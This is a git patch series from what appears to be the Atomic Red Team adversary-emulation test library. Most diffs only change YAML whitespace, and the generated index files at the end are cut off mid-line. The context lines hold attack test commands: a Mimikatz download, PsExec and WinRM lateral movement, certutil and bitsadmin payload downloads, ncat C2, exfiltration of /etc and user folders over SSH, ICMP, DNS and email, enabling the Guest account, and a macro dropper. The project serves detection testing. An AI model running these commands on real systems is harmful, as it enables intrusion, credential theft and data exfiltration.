           Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
@@ -63384,7 +63384,7 @@ lateral-movement:
           net start sesshijack
         cleanup_command: 'sc.exe delete sesshijack >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1021.001:
@@ -63456,7 +63456,7 @@ lateral-movement:
       auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
       description: 'Attempt an RDP session via Remote Desktop Application to a DomainController.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -63479,15 +63479,15 @@ lateral-movement:
       dependencies:
       - description: 'Computer must be domain joined
 
-          '
+'
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           { exit 0} else { exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually
 
-          '
+'
       executor:
         command: |
           $Server=#{logonserver}
@@ -63504,7 +63504,7 @@ lateral-movement:
       auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b
       description: 'Attempt an RDP session via Remote Desktop Application over Powershell
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -63769,7 +63769,7 @@ lateral-movement:
       auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3
       description: 'Connecting To Remote Shares
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -63793,13 +63793,13 @@ lateral-movement:
         command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
           /u:#{user_name}"
 
-          '
+'
         name: command_prompt
     - name: Map Admin Share PowerShell
       auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5
       description: 'Map Admin share utilizing PowerShell
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -63818,14 +63818,14 @@ lateral-movement:
       executor:
         command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
 
-          '
+'
         name: powershell
     - name: Copy and Execute File with PsExec
       auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf
       description: 'Copies a file to a remote host and executes it using PsExec. Requires
         the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -63846,10 +63846,10 @@ lateral-movement:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
 
-          '
+'
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -63879,7 +63879,7 @@ lateral-movement:
         command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file}
           2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1021.004:
@@ -64110,7 +64110,7 @@ lateral-movement:
       description: 'An adversary may use Radmin Viewer Utility to remotely control
         Windows device, this will start the radmin console.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -64126,10 +64126,10 @@ lateral-movement:
       - description: 'Radmin Viewer Utility must be installed at specified location
           (#{radmin_exe})
 
-          '
+'
         prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
 
-          '
+'
         get_prereq_command: |
           echo Downloading radmin installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -64422,7 +64422,7 @@ lateral-movement:
       executor:
         command: 'Enable-PSRemoting -Force
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Invoke-Command
@@ -64445,7 +64445,7 @@ lateral-movement:
       executor:
         command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
 
-          '
+'
         name: powershell
     - name: WinRM Access with Evil-WinRM
       auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
@@ -64805,7 +64805,7 @@ command-and-control:
           "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}"
           -QuickTimeout}
 
-          '
+'
         name: powershell
     - name: DNS Regular Beaconing
       auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
@@ -65603,7 +65603,7 @@ command-and-control:
       auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409
       description: 'Utilize rsync to perform a remote file copy (push)
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -65627,13 +65627,13 @@ command-and-control:
       executor:
         command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
 
-          '
+'
         name: bash
     - name: rsync remote file copy (pull)
       auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f
       description: 'Utilize rsync to perform a remote file copy (pull)
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -65657,13 +65657,13 @@ command-and-control:
       executor:
         command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
 
-          '
+'
         name: bash
     - name: scp remote file copy (push)
       auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344
       description: 'Utilize scp to perform a remote file copy (push)
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -65687,13 +65687,13 @@ command-and-control:
       executor:
         command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
 
-          '
+'
         name: bash
     - name: scp remote file copy (pull)
       auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33
       description: 'Utilize scp to perform a remote file copy (pull)
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -65717,13 +65717,13 @@ command-and-control:
       executor:
         command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
 
-          '
+'
         name: bash
     - name: sftp remote file copy (push)
       auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e
       description: 'Utilize sftp to perform a remote file copy (push)
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -65747,13 +65747,13 @@ command-and-control:
       executor:
         command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
 
-          '
+'
         name: bash
     - name: sftp remote file copy (pull)
       auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef'
       description: 'Utilize sftp to perform a remote file copy (pull)
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -65777,14 +65777,14 @@ command-and-control:
       executor:
         command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
 
-          '
+'
         name: bash
     - name: certutil download (urlcache)
       auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
       description: 'Use certutil -urlcache argument to download a file from the web.
         Note - /urlcache also works!
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -65799,17 +65799,17 @@ command-and-control:
       executor:
         command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
 
-          '
+'
         cleanup_command: 'del #{local_path} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: certutil download (verifyctl)
       auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
       description: 'Use certutil -verifyctl argument to download a file from the web.
         Note - /verifyctl also works!
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -65831,7 +65831,7 @@ command-and-control:
         cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force
           -Recurse -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Windows - BITSAdmin BITS Download
       auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
@@ -65857,7 +65857,7 @@ command-and-control:
         command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
           HIGH #{remote_file} #{local_path}
 
-          '
+'
         name: command_prompt
     - name: Windows - PowerShell Download
       auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
@@ -65879,17 +65879,17 @@ command-and-control:
         command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
           "#{destination_path}")
 
-          '
+'
         cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: OSTAP Worming Activity
       auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad
       description: 'OSTap copies itself in a specfic way to shares and secondary drives.
         This emulates the activity.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -65966,7 +65966,7 @@ command-and-control:
       auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
       description: 'Download a remote file using the whois utility
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -65994,29 +65994,29 @@ command-and-control:
       dependencies:
       - description: 'The whois and timeout commands must be present
 
-          '
+'
         prereq_command: 'which whois && which timeout
 
-          '
+'
         get_prereq_command: 'echo "Please install timeout and the whois package"
 
-          '
+'
       executor:
         name: sh
         elevation_required: false
         command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p
           #{remote_port} "#{query}" > #{output_file}
 
-          '
+'
         cleanup_command: 'rm -f #{output_file}
 
-          '
+'
     - name: File Download via PowerShell
       auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
       description: 'Use PowerShell to download and write an arbitrary file from the
         internet. Example is from the 2021 Threat Detection Report by Red Canary.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -66050,7 +66050,7 @@ command-and-control:
         name: command_prompt
         command: 'finger base64_filedata@#{remote_host}
 
-          '
+'
   T1090.001:
     technique:
       external_references:
@@ -66119,7 +66119,7 @@ command-and-control:
       executor:
         command: 'export #{proxy_scheme}_proxy=#{proxy_server}
 
-          '
+'
         cleanup_command: |
           unset http_proxy
           unset https_proxy
@@ -66508,10 +66508,10 @@ command-and-control:
       dependencies:
       - description: 'ncat.exe must be available at specified location (#{ncat_exe})
 
-          '
+'
         prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
@@ -66525,7 +66525,7 @@ command-and-control:
       executor:
         command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}
 
-          '
+'
         name: powershell
     - name: Powercat C2
       auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
@@ -66674,13 +66674,13 @@ command-and-control:
       executor:
         command: 'Test-NetConnection -ComputerName #{domain} -port #{port}
 
-          '
+'
         name: powershell
     - name: Testing usage of uncommonly used port
       auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767
       description: 'Testing uncommonly used port utilizing telnet.
 
-        '
+'
       supported_platforms:
       - linux
       - macos
@@ -66696,7 +66696,7 @@ command-and-control:
       executor:
         command: 'telnet #{domain} #{port}
 
-          '
+'
         name: sh
   T1102.003:
     technique:
@@ -66938,7 +66938,7 @@ command-and-control:
           -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content
           }
 
-          '
+'
         name: powershell
     - name: DNS over HTTPS Regular Beaconing
       auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b
@@ -67128,7 +67128,7 @@ command-and-control:
         and using this to maintain access to the machine. Download of TeamViewer installer
         will be at the destination location when sucessfully executed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -67150,7 +67150,7 @@ command-and-control:
         and use to establish C2. Download of AnyDesk installer will be at the destination
         location and ran when sucessfully executed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -67169,7 +67169,7 @@ command-and-control:
         and use to establish C2. Download of LogMeIn installer will be at the destination
         location and ran when sucessfully executed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -67189,7 +67189,7 @@ command-and-control:
         and use to establish C2. Download of GoToAssist installer will be at the destination
         location and ran when sucessfully executed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -67258,7 +67258,7 @@ command-and-control:
       auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25
       description: 'Utilizing a common technique for posting base64 encoded data.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -67564,7 +67564,7 @@ command-and-control:
       - description: "Curl must be installed on system \n"
         prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
           Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -67769,7 +67769,7 @@ exfiltration:
       auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
       description: 'Take a file/directory, split it into 5Mb chunks
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -67788,12 +67788,12 @@ exfiltration:
         prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else
           exit 0; fi;
 
-          '
+'
         get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path};
           touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name}
           bs=25000000 count=1
 
-          '
+'
       executor:
         command: |
           cd #{folder_path}; split -b 5000000 #{file_name}
@@ -67801,7 +67801,7 @@ exfiltration:
         cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path};
           fi;
 
-          '
+'
         name: sh
   T1048:
     technique:
@@ -67880,7 +67880,7 @@ exfiltration:
       executor:
         command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
 
-          '
+'
         name: sh
     - name: Exfiltration Over Alternative Protocol - SSH
       auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268
@@ -67910,7 +67910,7 @@ exfiltration:
         command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
           #{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
 
-          '
+'
         name: sh
   T1048.002:
     technique:
@@ -68282,13 +68282,13 @@ exfiltration:
           in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}",
           1500, $Data) }
 
-          '
+'
         name: powershell
     - name: Exfiltration Over Alternative Protocol - DNS
       auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45
       description: 'Exfiltration of specified file over DNS protocol.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
@@ -68333,7 +68333,7 @@ exfiltration:
         command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003
           Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
 
-          '
+'
         name: powershell
       input_arguments:
         input_file:
@@ -68946,16 +68946,16 @@ initial-access:
       description: 'The Adversaries can activate the default Guest user. The guest
         account is inactivated by default
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'net user guest /active:yes
 
-          '
+'
         cleanup_command: 'net user guest /active:no
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1078.002:
@@ -69269,7 +69269,7 @@ initial-access:
       description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
         please see "T1133\src\list of vpn extension.txt" to view complete list
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -69282,12 +69282,12 @@ initial-access:
           type: String
           default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
 
-            '
+'
       dependency_executor_name: powershell
       dependencies:
       - description: 'Chrome must be installed
 
-          '
+'
         prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
           -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
           {exit 0} else {exit 1}
@@ -69651,7 +69651,7 @@ initial-access:
         jse_path:
           description: 'Path for the macro to write out the "malicious" .jse file
 
-            '
+'
           type: String
           default: C:\Users\Public\art.jse
         ms_product:
@@ -69662,7 +69662,7 @@ initial-access:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -69673,7 +69673,7 @@ initial-access:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -69682,7 +69682,7 @@ initial-access:
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
 
-          '
+'
         name: powershell
   T1566.002:
     technique:

From a910184ca67cd8e9948dd21ebaac45643afc18f8 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy <88440780+esanyaCode@users.noreply.github.com>
Date: Tue, 17 Aug 2021 10:22:01 +0530
Subject: [PATCH 19/39] Update T1562.008.yaml

---
 atomics/T1562.008/T1562.008.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
index c6689e43..2b76c7a9 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1562.008/T1562.008.yaml
@@ -26,7 +26,7 @@ atomic_tests:
       prereq_command: |
         cat ~/.aws/credentials | grep "default"
         aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
-        aws s3api put-bucket-policy --bucket redatomic-test --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
+        aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
       get_prereq_command: |
         echo Please install the aws-cli and configure your AWS defult profile using: aws configure
   executor:

From 6f08a3100269b5ba73fee87ae67f09bb72dc550b Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Wed, 18 Aug 2021 20:14:35 +0000
Subject: [PATCH 20/39] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index aa96fbf8..4051f6a4 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -762,3 +762,4 @@ c4ae0701-88d3-4cd8-8bce-4801ed9f97e4
 eeb9751a-d598-42d3-b11c-c122d9c3f6c7
 9d77fed7-05f8-476e-a81b-8ff0472c64d0
 aa6cb8c4-b582-4f8e-b677-37733914abda
+9c10dc6b-20bd-403a-8e67-50ef7d07ed4e

From 2795e1312d8a6495d41f9b9a06711487e6f10faa Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 18 Aug 2021 20:14:40 +0000
Subject: [PATCH 21/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../art-navigator-layer-iaas.json             |  2 +-
 .../art-navigator-layer-linux.json            |  2 +-
 .../art-navigator-layer.json                  |  2 +-
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/linux-index.csv   |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  3 +-
 .../Indexes/Indexes-Markdown/linux-index.md   |  3 +-
 atomics/Indexes/Matrices/linux-matrix.md      |  2 +-
 atomics/Indexes/Matrices/matrix.md            |  2 +-
 atomics/Indexes/index.yaml                    | 45 ++++++++++++-
 atomics/T1562.008/T1562.008.md                | 67 +++++++++++++++++++
 11 files changed, 122 insertions(+), 8 deletions(-)
 create mode 100644 atomics/T1562.008/T1562.008.md

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
index 9964aaea..b6136576 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index c29f8eb0..09d2ec05 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"co